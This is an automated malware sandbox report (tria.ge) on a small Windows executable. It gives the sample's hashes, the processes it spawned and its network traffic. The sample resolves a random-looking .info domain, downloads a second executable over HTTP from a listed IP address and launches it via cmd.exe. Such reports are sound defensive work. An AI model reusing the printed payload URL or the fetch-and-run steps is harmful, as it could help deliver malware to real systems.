Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    14/10/2023, 19:17 UTC

General

  • Target

    NEAS.dd38841a447bead5b8beabb267592510.exe

  • Size

    5KB

  • MD5

    dd38841a447bead5b8beabb267592510

  • SHA1

    6b14e1db4af724dc90d4ac4f1b448534b08c27f1

  • SHA256

    ab7f93b129946c311d08f101414530ceafaa15365c06522264b29ac7e9512f28

  • SHA512

    f2e2a39da93258570e9f28be0db4d3fc1510ae05f24ae6a3159509e4e90bcd9eb3c521a16558f46b6149c49d897da0c32a23871a8bbc22006181fab09ba5e6d5

  • SSDEEP

    48:6MjtHxWXZR/4plYRWhxeXzu6fvQJrONvTrg7GtGd9d/9orw2d03z:xtHwXZJ4plYRccjrfYJrO9Tr3aor

Score
1/10

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NEAS.dd38841a447bead5b8beabb267592510.exe
    "C:\Users\Admin\AppData\Local\Temp\NEAS.dd38841a447bead5b8beabb267592510.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1720
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\20231015T091756_106.exe
      2⤵
        PID:2664

    Network

    • flag-us
      DNS
      20231015t091756_106.ltiapmyzmjxrvrts.info
      NEAS.dd38841a447bead5b8beabb267592510.exe
      Remote address:
      8.8.8.8:53
      Request
      20231015t091756_106.ltiapmyzmjxrvrts.info
      IN A
      Response
      20231015t091756_106.ltiapmyzmjxrvrts.info
      IN CNAME
      ltiapmyzmjxrvrts.info
      ltiapmyzmjxrvrts.info
      IN A
      54.37.238.86
    • flag-pl
      GET
      http://20231015t091756_106.ltiapmyzmjxrvrts.info/v4/20231015T091756_106.exe
      NEAS.dd38841a447bead5b8beabb267592510.exe
      Remote address:
      54.37.238.86:80
      Request
      GET /v4/20231015T091756_106.exe HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: 20231015t091756_106.ltiapmyzmjxrvrts.info
      Connection: Keep-Alive
    • 54.37.238.86:80
      http://20231015t091756_106.ltiapmyzmjxrvrts.info/v4/20231015T091756_106.exe
      http
      NEAS.dd38841a447bead5b8beabb267592510.exe
      524 B
      92 B
      3
      2

      HTTP Request

      GET http://20231015t091756_106.ltiapmyzmjxrvrts.info/v4/20231015T091756_106.exe
    • 8.8.8.8:53
      20231015t091756_106.ltiapmyzmjxrvrts.info
      dns
      NEAS.dd38841a447bead5b8beabb267592510.exe
      87 B
      117 B
      1
      1

      DNS Request

      20231015t091756_106.ltiapmyzmjxrvrts.info

      DNS Response

      54.37.238.86

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.